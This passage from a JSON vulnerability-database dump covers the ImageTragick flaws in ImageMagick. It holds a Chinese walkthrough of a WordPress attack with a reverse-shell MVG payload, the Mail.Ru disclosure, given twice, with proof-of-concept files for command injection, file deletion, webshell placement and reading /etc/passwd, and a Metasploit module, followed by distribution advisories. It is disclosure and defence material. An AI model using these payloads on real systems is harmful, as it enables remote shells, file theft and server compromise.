\u6743\u9650\u8d26\u53f7\u767b\u9646\uff0c\u53d1\u8868\u6587\u7ae0\uff0c\u63d2\u5165 Media\u3002\r\n\u4e0a\u4f20\u53e6\u5916\u4e00\u4e2a\u6b63\u5e38\u683c\u5f0f\u7684\u6587\u4ef6\uff1a\r\n\r\n\r\n\u8bb0\u4f4f post_id\uff0c\u6211\u8fd9\u4e2a\u4e3a 101\u3002 \u518d\u4e0a\u4f20 exp.png\uff0c\u5185\u5bb9\u4e3a\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\")'\r\npop graphic-context\r\n```\r\n\u8fd9\u4e2a\u7684 post_id \u4e3a 102\u3002\r\n\r\n\u63a5\u7740\u70b9\u51fb\u6211\u4eec\u6b63\u5e38\u7684\u90a3\u4e2a\u56fe\u7247\uff0c\u9009\u62e9\u7f16\u8f91\uff1a\r\n\r\n \r\n\u7136\u540e\u70b9 Edit Origin\u3002\u8fdb\u53bb\u6253\u5f00\u63a7\u5236\u53f0\uff0c\u968f\u4fbf\u505a\u4e00\u4e9b\u64cd\u4f5c\u540e\u6293\u5305\u62ff\u5230\u8bf7\u6c42\u7684 URL\u3002\u76f4\u63a5 Copy as cURL \u5c31\u597d\u4e86\u3002\r\n\r\n \r\n\u518d\u70b9\u51fb\u574f\u6389\u7684\u56fe\u7247-Edit-Edit Origin\uff0c\u6293\u5305\u770b\u5230\u8bf7\u6c42\u7684 admin-ajax.php\uff0c\u62ff\u51fa _ajax_nonce\u3002\u6700\u540e\u6539\u6389\u4e4b\u524d Copy as cURL \u5185\u7684 _ajax_nonce \u548c post_id\uff0c\u4e0b\u56fe\u5212\u6846\u6846\u7684\u5730\u65b9\u662f\u8981\u6539\u7684\u5730\u65b9\u3002\r\n\r\n\r\n\r\n\u56de\u8f66\r\n\r\n\r\n\r\nshell 
\u5df2\u7ecf\u8eba\u597d\u4e86\u3002\r\n\r\n### \u5176\u4ed6\u53c2\u8003\u5730\u5740\r\n* https://www.seebug.org/vuldb/ssvid-91446\r\n* https://imagetragick.com/\r\n* http://www.openwall.com/lists/oss-security/2016/05/03/18\r\n* https://blog.sucuri.net/2016/05/imagemagick-remote-command-execution-vulnerability.html", "published": "2016-05-05T00:00:00", "type": "seebug", "title": "Wordpress 4.5.1 Remote Command Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91463", "id": "SSV:91463", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-05-04T21:20:06", "description": "ImageMagick - Multiple Vulnerabilities. CVE-2016-3714,CVE-2016-3715,CVE-2016-3716,CVE-2016-3717,CVE-2016-3718. Dos exploits for multiple platform", "published": "2016-05-04T00:00:00", "type": "exploitdb", "title": "ImageMagick < 6.9.3-9 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EDB-ID:39767", "href": "https://www.exploit-db.com/exploits/39767/", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\r\nvulnerabilities in ImageMagick.\r\nWe've reported these issues to developers of ImageMagick and they made a\r\nfix for RCE in sources and released new version (6.9.3-9 released\r\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\r\nfix seems to be incomplete. We are still working with developers.\r\n\r\nImageMagick: Multiple vulnerabilities in image decoder\r\n\r\n1. 
CVE-2016-3714 - Insufficient shell characters filtering leads to\r\n(potentially remote) code execution\r\n\r\nInsufficient filtering for filename passed to delegate's command allows\r\nremote code execution during conversion of several file formats.\r\n\r\nImageMagick allows to process files with external libraries. This\r\nfeature is called 'delegate'. It is implemented as a system() with\r\ncommand string ('command') from the config file delegates.xml with\r\nactual value for different params (input/output filenames etc). Due to\r\ninsufficient %M param filtering it is possible to conduct shell command\r\ninjection. One of the default delegate's command is used to handle https\r\nrequests:\r\n\"wget\" -q -O \"%o\" \"https:%M\"\r\nwhere %M is the actual link from the input. It is possible to pass the\r\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\r\n-la'. (wget or curl should be installed)\r\n\r\n$ convert 'https://example.com\"|ls \"-la' out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n\r\n\r\nThe most dangerous part is ImageMagick supports several formats like\r\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\r\nthis file format and idea of the local file read vulnerability in\r\nImageMagick, see below), maybe some others - which allow to include\r\nexternal files from any supported protocol including delegates. 
As a\r\nresult, any service, which uses ImageMagick to process user supplied\r\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\r\nthis issue.\r\n\r\nexploit.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\r\npop graphic-context\r\n\r\nexploit.svg\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\r\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\r\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\r\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\r\n\"http://www.w3.org/1999/xlink\">\r\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\r\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\r\n</svg>\r\n\r\n$ convert exploit.mvg out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n\r\nImageMagick tries to guess the type of the file by it's content, so\r\nexploitation doesn't depend on the file extension. You can rename\r\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\r\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\r\nbe used as a protection to filter file by it's content and creates\r\nadditional attack vectors (e.g. via 'less exploit.jpg', because\r\n'identify' is invoked via lesspipe.sh).\r\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\r\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\r\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\r\n(or curl) should be installed on the system for successful PoC\r\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\r\n\r\nAll other issues also rely on dangerous ImageMagick feature of external\r\nfiles inclusion from any supported protocol in formats like svg and mvg.\r\n\r\n2. 
CVE-2016-3718 - SSRF\r\nIt is possible to make HTTP GET or FTP request:\r\n\r\nssrf.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n\r\n$ convert ssrf.mvg out.png # makes http request to example.com\r\n\r\n3. CVE-2016-3715 - File deletion\r\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\r\nprotocol which deletes files after reading:\r\n\r\ndelete_file.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n\r\n$ touch /tmp/delete.txt\r\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\r\n\r\n4. CVE-2016-3716 - File moving\r\nIt is possible to move image files to file with any extension in any\r\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\r\nimage.gif should exist in known location - /tmp/ for PoC (in real life\r\nit may be web service written in PHP, which allows to upload raw txt\r\nfiles and process images with ImageMagick):\r\n\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n\r\n/tmp/image.gif - image with php shell inside\r\n(https://www.secgeek.net/POC/POC.gif for example)\r\n\r\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\r\n\r\n5. 
CVE-2016-3717 - Local file read (independently reported by original\r\nresearch author - https://hackerone.com/stewie)\r\nIt is possible to get content of the files from the server by using\r\nImageMagick's 'label' pseudo protocol:\r\n\r\nfile_read.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@...c/passwd'\r\npop graphic-context\r\n\r\n$ convert file_read.mvg out.png # produces file with text rendered from\r\n/etc/passwd\r\n\r\n\r\nHow to mitigate the vulnerability.\r\n\r\nAvailable patches appear to be incomplete.\r\nIf you use ImageMagick or an affected library, we recommend you mitigate\r\nthe known vulnerabilities by doing at least one of these two things (but\r\npreferably both!):\r\n1. Verify that all image files begin with the expected \u201cmagic bytes\u201d\r\ncorresponding to the image file types you support before sending them to\r\nImageMagick for processing. (see FAQ for more info)\r\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\r\nglobal policy for ImageMagick is usually found in \u201c/etc/ImageMagick\u201d.\r\nThis policy.xml example will disable the coders EPHEMERAL, URL, HTTPS,\r\nMVG, and MSL:\r\n\r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\nApril, 21 2016 - file read vulnerability report for one of My.Com\r\nservices from https://hackerone.com/stewie received by Mail.Ru Security\r\nTeam. 
Issue is reportedly known to ImageMagic team.\r\nApril, 21 2016 - file read vulnerability patched by My.Com development team\r\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\r\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\r\noriginal report\r\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\r\ndevelopment team\r\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\r\n(incomplete fix)\r\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\r\nMay, 1 2016 - ImageMagic informed of the fix bypass\r\nMay, 2 2016 - limited disclosure to 'distros' mailing list\r\nMay, 3 2016 - public disclosure at https://imagetragick.com/\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39767/"}, {"lastseen": "2016-05-09T21:15:09", "description": "ImageMagick Delegate Arbitrary Command Execution. CVE-2016-3714. Local exploits for multiple platform", "published": "2016-05-09T00:00:00", "type": "exploitdb", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-09T00:00:00", "id": "EDB-ID:39791", "href": "https://www.exploit-db.com/exploits/39791/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',\r\n 'Description' => %q{\r\n This module exploits a shell command injection in the way \"delegates\"\r\n (commands for converting files) are processed in ImageMagick versions\r\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\r\n\r\n Since ImageMagick uses file magic to detect file format, you can create\r\n a .png 
(for example) which is actually a crafted SVG (for example) that\r\n triggers the command injection.\r\n\r\n Tested on Linux, BSD, and OS X. You'll want to choose your payload\r\n carefully due to portability concerns. Use cmd/unix/generic if need be.\r\n },\r\n 'Author' => [\r\n 'stewie', # Vulnerability discovery\r\n 'Nikolay Ermishkin', # Vulnerability discovery\r\n 'wvu', # Metasploit module\r\n 'hdm' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-3714},\r\n %w{URL https://imagetragick.com/},\r\n %w{URL http://seclists.org/oss-sec/2016/q2/205},\r\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},\r\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}\r\n ],\r\n 'DisclosureDate' => 'May 3 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => false,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\\x5c\", # \", ', and \\\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat bash-tcp'\r\n }\r\n },\r\n 'Targets' => [\r\n ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg\r\n ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg\r\n ['MIFF file', template: 'msf.miff'] # convert -label \"\" msf.svg msf.miff\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\r\n 'LHOST' => Rex::Socket.source_address,\r\n 'DisablePayloadHandler' => false,\r\n 'WfsDelay' => 9001\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('FILENAME', [true, 'Output file', 'msf.png'])\r\n ])\r\n end\r\n\r\n def exploit\r\n if target.name == 'SVG file'\r\n p = Rex::Text.html_encode(payload.encoded)\r\n else\r\n p = payload.encoded\r\n end\r\n\r\n file_create(template.sub('echo vulnerable', p))\r\n end\r\n\r\n def template\r\n File.read(File.join(\r\n Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]\r\n ))\r\n end\r\n\r\nend", "cvss": {"score": 10.0, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39791/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "edition": 1, "published": "2016-05-04T00:00:00", "title": "ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103", "href": "", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\nvulnerabilities in ImageMagick.\nWe've reported these issues to developers of ImageMagick and they made a\nfix for RCE in sources and released new version (6.9.3-9 released\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\nfix seems to be incomplete. We are still working with developers.\n\nImageMagick: Multiple vulnerabilities in image decoder\n\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\n(potentially remote) code execution\n\nInsufficient filtering for filename passed to delegate's command allows\nremote code execution during conversion of several file formats.\n\nImageMagick allows to process files with external libraries. This\nfeature is called 'delegate'. It is implemented as a system() with\ncommand string ('command') from the config file delegates.xml with\nactual value for different params (input/output filenames etc). Due to\ninsufficient %M param filtering it is possible to conduct shell command\ninjection. One of the default delegate's command is used to handle https\nrequests:\n\"wget\" -q -O \"%o\" \"https:%M\"\nwhere %M is the actual link from the input. It is possible to pass the\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\n-la'. 
(wget or curl should be installed)\n\n$ convert 'https://example.com\"|ls \"-la' out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\n\nThe most dangerous part is ImageMagick supports several formats like\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\nthis file format and idea of the local file read vulnerability in\nImageMagick, see below), maybe some others - which allow to include\nexternal files from any supported protocol including delegates. As a\nresult, any service, which uses ImageMagick to process user supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\nthis issue.\n\nexploit.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\npop graphic-context\n\nexploit.svg\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" standalone=\"no\"?>\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\n\"http://www.w3.org/1999/xlink\">\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\n</svg>\n\n$ convert exploit.mvg out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\nImageMagick tries to guess the type of the file by it's content, so\nexploitation doesn't depend on the file extension. You can rename\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\nbe used as a protection to filter file by it's content and creates\nadditional attack vectors (e.g. 
via 'less exploit.jpg', because\n'identify' is invoked via lesspipe.sh).\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\n(or curl) should be installed on the system for successful PoC\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\n\nAll other issues also rely on dangerous ImageMagick feature of external\nfiles inclusion from any supported protocol in formats like svg and mvg.\n\n2. CVE-2016-3718 - SSRF\nIt is possible to make HTTP GET or FTP request:\n\nssrf.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(http://example.com/)'\npop graphic-context\n\n$ convert ssrf.mvg out.png # makes http request to example.com\n\n3. CVE-2016-3715 - File deletion\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\nprotocol which deletes files after reading:\n\ndelete_file.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\npopgraphic-context\n\n$ touch /tmp/delete.txt\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\n\n4. CVE-2016-3716 - File moving\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. 
msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick):\n\nfile_move.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\npopgraphic-context\n\n/tmp/msl.txt\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<image>\n<read filename=\"/tmp/image.gif\" />\n<write filename=\"/var/www/shell.php\" />\n</image>\n\n/tmp/image.gif - image with php shell inside\n(https://www.secgeek.net/POC/POC.gif for example)\n\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\n\n5. CVE-2016-3717 - Local file read (independently reported by original\nresearch author - https://hackerone.com/stewie)\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol:\n\nfile_read.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'label:@...c/passwd'\npop graphic-context\n\n$ convert file_read.mvg out.png # produces file with text rendered from\n/etc/passwd\n\n\nHow to mitigate the vulnerability.\n\nAvailable patches appear to be incomplete.\nIf you use ImageMagick or an affected library, we recommend you mitigate\nthe known vulnerabilities by doing at least one these two things (but\npreferably both!):\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\ncorresponding to the image file types you support before sending them to\nImageMagick for processing. (see FAQ for more info)\n2. Use a policy file to disable the vulnerable ImageMagick coders. 
The\nglobal policy for ImageMagick is usually found in \u201c/etc/ImageMagick\u201d.\nThis policy.xml example will disable the coders EPHEMERAL, URL, HTTPS,\nMVG, and MSL:\n\n<policymap>\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\n</policymap>\n\n\nVulnerability Disclosure Timeline:\nApril, 21 2016 - file read vulnerability report for one of My.Com\nservices from https://hackerone.com/stewie received by Mail.Ru Security\nTeam. Issue is reportedly known to ImageMagick team.\nApril, 21 2016 - file read vulnerability patched by My.Com development team\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\noriginal report\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\ndevelopment team\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\n(incomplete fix)\nApril, 30 2016 - fixed ImageMagick version 6.9.3-9 published (incomplete fix)\nMay, 1 2016 - ImageMagick informed of the fix bypass\nMay, 2 2016 - limited disclosure to 'distros' mailing list\nMay, 3 2016 - public disclosure at https://imagetragick.com/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0726\n\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-May/033903.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-May/033904.html\n\n**Affected packages:**\nImageMagick\nImageMagick-c++\nImageMagick-c++-devel\nImageMagick-devel\nImageMagick-doc\nImageMagick-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0726.html", "edition": 3, "modified": "2016-05-09T17:55:46", "published": "2016-05-09T17:51:59", "href": "http://lists.centos.org/pipermail/centos-announce/2016-May/033903.html", "id": "CESA-2016:0726", "title": "ImageMagick security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "description": "ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "modified": "2018-06-06T20:24:27", "published": "2016-05-09T20:56:15", "id": "RHSA-2016:0726", "href": "https://access.redhat.com/errata/RHSA-2016:0726", "type": "redhat", "title": "(RHSA-2016:0726) Important: ImageMagick security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "**Issue Overview:**\n\nIt was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. ([CVE-2016-3714 __](<https://access.redhat.com/security/cve/CVE-2016-3714>))\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files. ([CVE-2016-3715 __](<https://access.redhat.com/security/cve/CVE-2016-3715>), [CVE-2016-3716 __](<https://access.redhat.com/security/cve/CVE-2016-3716>), [CVE-2016-3717 __](<https://access.redhat.com/security/cve/CVE-2016-3717>))\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. ([CVE-2016-3718 __](<https://access.redhat.com/security/cve/CVE-2016-3718>))\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. 
Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n \n**Affected Packages:** \n\n\nImageMagick\n\n \n**Issue Correction:** \nRun _yum update ImageMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ImageMagick-doc-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-perl-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-c++-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-devel-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686 \n \n src: \n ImageMagick-6.7.8.9-13.19.amzn1.src \n \n x86_64: \n ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-05-11T11:00:00", "published": "2016-05-11T11:00:00", "id": "ALAS-2016-699", "href": "https://alas.aws.amazon.com/ALAS-2016-699.html", "title": "Important: ImageMagick", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-03T00:14:07", "description": "Exploit for multiple platform in category 